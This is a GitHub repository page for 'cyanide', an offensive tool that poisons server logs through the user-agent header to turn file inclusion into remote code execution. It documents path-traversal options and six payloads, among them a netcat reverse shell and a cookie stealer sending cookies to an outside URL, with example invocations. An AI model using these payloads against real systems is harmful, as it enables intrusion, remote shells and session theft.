Skip to content
/ cyanide Public

Cyanide is a tool to poison request logs by injecting a payload in the user-agent. It currently has 6 standalone payloads.

License

MIT license
2 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Noxtal/cyanide

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
docs
docs
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
cyanide.py
cyanide.py
 
 

Repository files navigation

cyanide

Visits Badge

(a wiki is available here)

Cyanide is a tool to poison request logs by injecting a payload in the user-agent. They can then be accessed back using an Local File Inclusion to trigger Remote Code Execution. It currently has a total of 6 great standalone payloads.

Installation

As of now, the only way of using this project is by cloning the repo or with this download link.

Usage

usage: cyanide.py [-h] [-q] [-Pl] [-pl [PAYLOAD ...]] [-m METHOD] [-P PARAMETER]
                  [-C COOKIES] [-e] [-E] [-p PREFIX] [-s SUFFIX] [-u URL]

Log poisoner. Turns a Local File Inclusion to a Remote Code Execution. Counts 6
different payloads for now.

optional arguments:
  -h, --help            show this help message and exit
  -q, --quiet, --no-banner
                        Quiet mode. No banner.
  -Pl, --payloads, --list
                        List all possible payloads.
  -pl [PAYLOAD ...], --payload [PAYLOAD ...], --set-payload [PAYLOAD ...]
                        Set payload (by index or ID). Use -Pl to list available
                        payloads.
  -m METHOD, --method METHOD
                        HTTP request method. Ex.: POST
  -P PARAMETER, --par PARAMETER, --parameter PARAMETER
                        Query parameter name. Ex.: '-P view' => '?view='
  -C COOKIES, --cookies COOKIES
                        Set request cookies such as PHP session in JSON format (ex.:
                        '{"key":"value", ...}').
  -e, --encode, --dds-encode
                        URL encode ../
  -E, --double-encode, --dds-double-encode
                        Double-encode ../
  -p PREFIX, --prefix PREFIX
                        Query prefix. Ex.: '../../../../../etc/cat/'
  -s SUFFIX, --suffix SUFFIX
                        Query suffix. Ex.: '&other='
  -u URL, --URL URL, --url URL
                        URL to attack.

Payloads:

[?] PHPCMD (min. 72 chars, requires 0 args) -> PHP Simple Command Injection: [PHP] Simple command injection with query variable 'c'. Usage: Ex.: ?c=ls
[?] PHPB64CMD (min. 102 chars, requires 0 args) -> PHP Simple Base64 Command Injection: [PHP] Simple command injection with query variable 'b', but the command is base64 and URL encoded. Usage: Ex.: ?b=bHM%3D
[?] PHPREVSHELL (min. 78 chars, requires 2 args) -> PHP Simple NETCAT Reverse Shell: [PHP] Simple Reverse Shell. Needs two arguments, the IP and port. WARNING: REQUIRES Netcat. Usage: Specify the arguments after choosing the payload. Ex.: -pl PHPREVSHELL 127.0.0.1 4444
[?] PHPREADFILE (min. 130 chars, requires 0 args) -> PHP File Reader: [PHP] Read a file's contents. Using parameter 'f' to specificy a filename. Usage: Ex.: ?f=filename.ext
[?] PHPUPLOAD (min. 328 chars, requires 0 args) -> PHP Simple File Upload: [PHP] Simple file upload page to pop in the logs. Usage: You should find a typical file upload section in the logs.
[?] JSCOOKIEXSS (min. 104 chars, requires 1 args) -> JavaScript Simple XSS Cookie Stealer: [JS] Simple XSS Cookie Stealer. Needs one argument being the link to send a request with the cookies to. Usage: Specify the URL after choosing the payload. Ex.: -pl JSCOOKIEXSS http://myurl.com/

About

Cyanide is a tool to poison request logs by injecting a payload in the user-agent. It currently has 6 standalone payloads.

Resources

Readme

License

MIT license
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 2

Cyanide V1.3.1 Latest
Mar 6, 2022
+ 1 release

Packages

No packages published

Languages